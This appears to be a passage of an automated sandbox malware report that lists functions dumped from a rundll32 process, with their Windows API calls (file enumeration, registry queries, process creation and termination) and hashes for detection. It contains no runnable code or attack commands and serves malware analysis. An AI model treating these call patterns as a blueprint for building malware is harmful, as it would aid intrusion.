                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 05577CD7
                                                            • Part of subcall function 055760A2: lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,05577CF7,?), ref: 055760CE
                                                            • Part of subcall function 055760A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 055760E0
                                                            • Part of subcall function 055760A2: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 055760FD
                                                            • Part of subcall function 055760A2: lstrlenW.KERNEL32(00000000,?,?,05577CF7,?), ref: 05576109
                                                            • Part of subcall function 055760A2: HeapFree.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 0557611D
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05577D0F
                                                          • CloseHandle.KERNEL32(?), ref: 05577D1D
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 05577DEF
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05577DFE
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 05577E11
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                          • String ID:
                                                          • API String ID: 1719504581-0
                                                          • Opcode ID: 7102ede0666c3a1999720c7463da4a0e3ba35f1418ae88a9fbc22b6648cf6332
                                                          • Instruction ID: 59849f3aae760a3a91ef2ddc712319267ea64a497b9c87311442e236cca4456b
                                                          • Opcode Fuzzy Hash: 7102ede0666c3a1999720c7463da4a0e3ba35f1418ae88a9fbc22b6648cf6332
                                                          • Instruction Fuzzy Hash: 5941B43162070AEBDB21DFA4F885EAA7B79FF48740F050426F811AB110DB74EE58DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558E193, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec61880880f9b3ead56e9133bbd2f82ec55de1b97e19be8734e9ad3e5cb34dcb
                                                          • Instruction ID: 72ab24247a05c5bd0df3dba0c078bc10b184c48adc126f7f772e77c4315324e5
                                                          • Opcode Fuzzy Hash: ec61880880f9b3ead56e9133bbd2f82ec55de1b97e19be8734e9ad3e5cb34dcb
                                                          • Instruction Fuzzy Hash: 0D41B271604705DFE720AFA59C8A93BBBFDBB84360B114A2EF5A7D21C0EB709804CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557210F, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 05572162
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05572183
                                                          • lstrlenW.KERNEL32(?), ref: 055721AD
                                                            • Part of subcall function 055714A0: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                            • Part of subcall function 055714A0: RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 055714A0: RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571687
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 055721CA
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 055721E1
                                                          • PathFindFileNameW.SHLWAPI(0000001E), ref: 055721F6
                                                            • Part of subcall function 05590C15: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,0557220D,?,0000001E,?), ref: 05590C2A
                                                            • Part of subcall function 05590C15: lstrlenW.KERNEL32(?,?,?,?,0557220D,?,0000001E,?), ref: 05590C32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                          • String ID:
                                                          • API String ID: 2670873185-0
                                                          • Opcode ID: a4fd01cb82f279f22cdbf611a48f98901cd14c749bcbb0db3102f5df70cb3fc8
                                                          • Instruction ID: 852e17070eccc558d7f112054366f51e2ab19e1c92b5fc6d85b9e763ecf9d82a
                                                          • Opcode Fuzzy Hash: a4fd01cb82f279f22cdbf611a48f98901cd14c749bcbb0db3102f5df70cb3fc8
                                                          • Instruction Fuzzy Hash: 7431507650820AAFCB11AFA5E888C2EBBF9FF88354F15092EF48593110DB35D919DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581DB7, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                          • CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                          • GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                          • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                          • String ID:
                                                          • API String ID: 1835239314-0
                                                          • Opcode ID: 1a31c209cc802c1b8467488828638647c37e45285cf76592aaf4ac2f099c4ed4
                                                          • Instruction ID: 84e41310d04a314d52c504d50ac8208b91f70427d3bcf9b26d89edc16717c16c
                                                          • Opcode Fuzzy Hash: 1a31c209cc802c1b8467488828638647c37e45285cf76592aaf4ac2f099c4ed4
                                                          • Instruction Fuzzy Hash: BC313871910509EBDF20EF95D889CBFBFBAFB95750B618416F405F2100D7349A49DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590488, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05582C2E,00000000,?,?,?), ref: 055904A0
                                                          • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05582C2E,00000000,?,?,?), ref: 055904B1
                                                            • Part of subcall function 0558BA08: lstrlen.KERNEL32(?,?,00000000,00000000,?,05571CBC,00000000,?,?,00000000,00000001), ref: 0558BA1A
                                                            • Part of subcall function 0558BA08: StrChrA.SHLWAPI(?,0000000D,?,05571CBC,00000000,?,?,00000000,00000001), ref: 0558BA52
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 055904F1
                                                          • memcpy.NTDLL(00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559051E
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559052D
                                                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559053F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 9c9024196588984a39e1b747e8387d10e387a9bf5cd5f77a6124f5cb0aaa80ec
                                                          • Instruction ID: 2d73fc311caa0a2486d5f5d8d24b85bf8444c4f9450ec882f4de4670c46fe13d
                                                          • Opcode Fuzzy Hash: 9c9024196588984a39e1b747e8387d10e387a9bf5cd5f77a6124f5cb0aaa80ec
                                                          • Instruction Fuzzy Hash: 6B21B072600209FFDF10DF95DC89F9ABBACFF08254F054052F909DB151E634EA449BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557EFC3, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0557F002
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0557F013
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 0557F02E
                                                          • GetLastError.KERNEL32 ref: 0557F044
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F056
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F06B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                          • String ID:
                                                          • API String ID: 1822509305-0
                                                          • Opcode ID: 0fa5e364ca75858702f4971074551a15552e9598dc7174249ea537f28ab7c30c
                                                          • Instruction ID: 439adf739d6fb3f1c25068f2c0fb8ab9f93c6584332911ce29a9f66d062687f0
                                                          • Opcode Fuzzy Hash: 0fa5e364ca75858702f4971074551a15552e9598dc7174249ea537f28ab7c30c
                                                          • Instruction Fuzzy Hash: 9111817650101CFBCF21AB96EC49CEF7F7EFF452A0B010462F505E2150CA359A59EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557E9C4, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0557E9EC
                                                          • _strupr.NTDLL ref: 0557EA27
                                                          • lstrlen.KERNEL32(00000000), ref: 0557EA2F
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 0557EA6E
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0557EA75
                                                          • GetLastError.KERNEL32 ref: 0557EA7D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 110452925-0
                                                          • Opcode ID: cf90bb7e4139eeeedb2c6d6230302ae111348b3275692b77d2c7f98dac0a11ab
                                                          • Instruction ID: 74c565411b09e4bea3ee7bc579c90f735b981c61fd6f42c2c0de90939550543a
                                                          • Opcode Fuzzy Hash: cf90bb7e4139eeeedb2c6d6230302ae111348b3275692b77d2c7f98dac0a11ab
                                                          • Instruction Fuzzy Hash: D011C472500608AFDF11AB74AC8ED7E7B7EFB88654B050456F903D2040EF789848DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558FA96, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,7519F710), ref: 0558FAB4
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0558FAE2
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0558FAF4
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0558FB19
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558FB34
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558FB3E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                          • String ID:
                                                          • API String ID: 170146033-0
                                                          • Opcode ID: 8876ad11f62043bdc7fcecd5e9ba443e2f9ff973ecca4d816d69c2daa71e3b2c
                                                          • Instruction ID: 563c7688316c9403f268388aab85d859ef79458c053530e82e174bb8cc53cd8d
                                                          • Opcode Fuzzy Hash: 8876ad11f62043bdc7fcecd5e9ba443e2f9ff973ecca4d816d69c2daa71e3b2c
                                                          • Instruction Fuzzy Hash: 7E111776900108FFDB11EB99EC85CEEBFBDFB48214B014066F901E2014EB35AE49EB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557DD74, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD85
                                                          • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD8C
                                                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0557DD9E
                                                          • _snprintf.NTDLL ref: 0557DDC4
                                                            • Part of subcall function 05586CA6: memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 05586CA6: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                            • Part of subcall function 05586CA6: wcstombs.NTDLL ref: 05586CFE
                                                            • Part of subcall function 05586CA6: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                            • Part of subcall function 05586CA6: TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DB8
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • _snprintf.NTDLL ref: 0557DDF8
                                                            • Part of subcall function 05586CA6: GetLastError.KERNEL32 ref: 05586D89
                                                            • Part of subcall function 05586CA6: GetExitCodeProcess.KERNEL32(?,00000001), ref: 05586DA9
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0557DE15
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                          • String ID:
                                                          • API String ID: 1481739438-0
                                                          • Opcode ID: 5aef236936739ed3ac6058d00be3fcf7f4b7c50157e1bb3206f13badab1cffe4
                                                          • Instruction ID: ee548623e421958ee974b69c13b9a73c948784491b9b3eee904b3af68d25993e
                                                          • Opcode Fuzzy Hash: 5aef236936739ed3ac6058d00be3fcf7f4b7c50157e1bb3206f13badab1cffe4
                                                          • Instruction Fuzzy Hash: FA1100B2610219BFCF11AF95DC85D9A3F7CFF08360B024016FD0997211CA39EA18EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558EB04, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(05572D6E,00000000,00000000,00000008,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB1A
                                                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0558EB2D
                                                          • lstrcpy.KERNEL32(00000008,05572D6E), ref: 0558EB4F
                                                          • GetLastError.KERNEL32(05589562,00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB78
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB90
                                                          • CloseHandle.KERNEL32(00000000,05589562,00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 2860611006-0
                                                          • Opcode ID: dc79156947ce23db84e987d38e71d62e0c706470379cd09df826e405198a5288
                                                          • Instruction ID: 86e2413af7185de2ffd4391a3c561c62ff5c6189cb468961aabd57659945fdac
                                                          • Opcode Fuzzy Hash: dc79156947ce23db84e987d38e71d62e0c706470379cd09df826e405198a5288
                                                          • Instruction Fuzzy Hash: DE117F71605209EFDB10AF65D88A8AE7BBCFB45262705452AF457E3200DB349D099B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055919DC, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                          • GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                          • lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1175089793-0
                                                          • Opcode ID: 267f1aa5ee2616037faf91e9d39a85274a18d25a78beb1cdedcac2c8d1801d1c
                                                          • Instruction ID: 3661fdcc0e4abe801355fbbabee5c860dc6fdeb6298cf9d54ffc3d98b131670c
                                                          • Opcode Fuzzy Hash: 267f1aa5ee2616037faf91e9d39a85274a18d25a78beb1cdedcac2c8d1801d1c
                                                          • Instruction Fuzzy Hash: B501A132A1462AAB9B115BA69C89D6B3FACFBC1A907060016F906D3100DE6CED08D7F5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558B0B8, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastmemset
                                                          • String ID: vids
                                                          • API String ID: 3276359510-3767230166
                                                          • Opcode ID: 364469d61004388342a4bd34d63fc4d7d3f5df7e98131dfd13bbbf5867f68ddb
                                                          • Instruction ID: f2304d50cfbe28d6bd317ac5bb5342eb5c84e23f1a80fc8b94f324ee5a85a042
                                                          • Opcode Fuzzy Hash: 364469d61004388342a4bd34d63fc4d7d3f5df7e98131dfd13bbbf5867f68ddb
                                                          • Instruction Fuzzy Hash: 6D8107B1E10219EFCF20EFA4D9849ADBBB9FF48710F10855AF415EB250DA359A45CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5627E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E562BF
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E563A2
                                                            • Part of subcall function 00E54598: SysAllocString.OLEAUT32(00E592B0), ref: 00E545E8
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 00E563F6
                                                          • SysFreeString.OLEAUT32(?), ref: 00E56404
                                                            • Part of subcall function 00E5708C: Sleep.KERNEL32(000001F4), ref: 00E570D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID: }
                                                          • API String ID: 3193056040-3553927478
                                                          • Opcode ID: ef14869cae9a18b9d644d0a454f7caaa3be912a7b75ea4c4bfc07be7525fa987
                                                          • Instruction ID: 8c5455316b43656940483ee12273d4f6d00f86e02761b62d4aa414938d76a197
                                                          • Opcode Fuzzy Hash: ef14869cae9a18b9d644d0a454f7caaa3be912a7b75ea4c4bfc07be7525fa987
                                                          • Instruction Fuzzy Hash: F2512F76900209EFCB10DFA4C8848AEB7F6FF88315B548C69E955FB260D731AD49CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557538A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 05575435
                                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 0557549C
                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 055754A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BuffersErrorFileFlushLastmemset
                                                          • String ID: K$P
                                                          • API String ID: 3817869962-420285281
                                                          • Opcode ID: 31e679c1b7a62654acd3a0aa5bfd7cdfe952d0164d8d069995e912710f60f778
                                                          • Instruction ID: 6ed07f644e7a011ccb37e6a5d4ae8fa6e4de04556a68ff401bc5255afc47eb06
                                                          • Opcode Fuzzy Hash: 31e679c1b7a62654acd3a0aa5bfd7cdfe952d0164d8d069995e912710f60f778
                                                          • Instruction Fuzzy Hash: 9A418171A04709DFDB24CFA4D984ABEBBF6FF44705F14492DD48A93680E735A908CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581C8D, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,055817A3,00000000,?,?,?,055817A3,?,?,?,?,?), ref: 05581CCB
                                                          • lstrlen.KERNEL32(055817A3,?,?,?,055817A3,?,?,?,?,?), ref: 05581CE9
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 05581D58
                                                          • lstrlen.KERNEL32(055817A3,00000000,00000000,?,?,?,055817A3,?,?,?,?,?), ref: 05581D79
                                                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 05581D8D
                                                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 05581D96
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05581DA4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$FreeLocal
                                                          • String ID:
                                                          • API String ID: 1123625124-0
                                                          • Opcode ID: e82d5f7a1054e41356227e4c2c8fc7a73fdf106a0f9758ce4ecb126b9870e201
                                                          • Instruction ID: 9ddcef2153919bb920364de506f574384ae0375a5278b8d2128d00dec7d0830d
                                                          • Opcode Fuzzy Hash: e82d5f7a1054e41356227e4c2c8fc7a73fdf106a0f9758ce4ecb126b9870e201
                                                          • Instruction Fuzzy Hash: 9A41067290061AAFCF10EF69DC459AA3FA8FF043A0B054416FD19A7210E635EE65DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590190, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000010), ref: 055901E1
                                                          • memcpy.NTDLL(00000000,?,?,00000010), ref: 05590274
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 055902CC
                                                          • GetLastError.KERNEL32 ref: 055902FE
                                                          • GetLastError.KERNEL32 ref: 05590312
                                                          • GetLastError.KERNEL32 ref: 05590327
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$memcpy
                                                          • String ID:
                                                          • API String ID: 2760375183-0
                                                          • Opcode ID: da5ee6887bc530691db436172c095fe345b900475db24cf4db21ec42261584d8
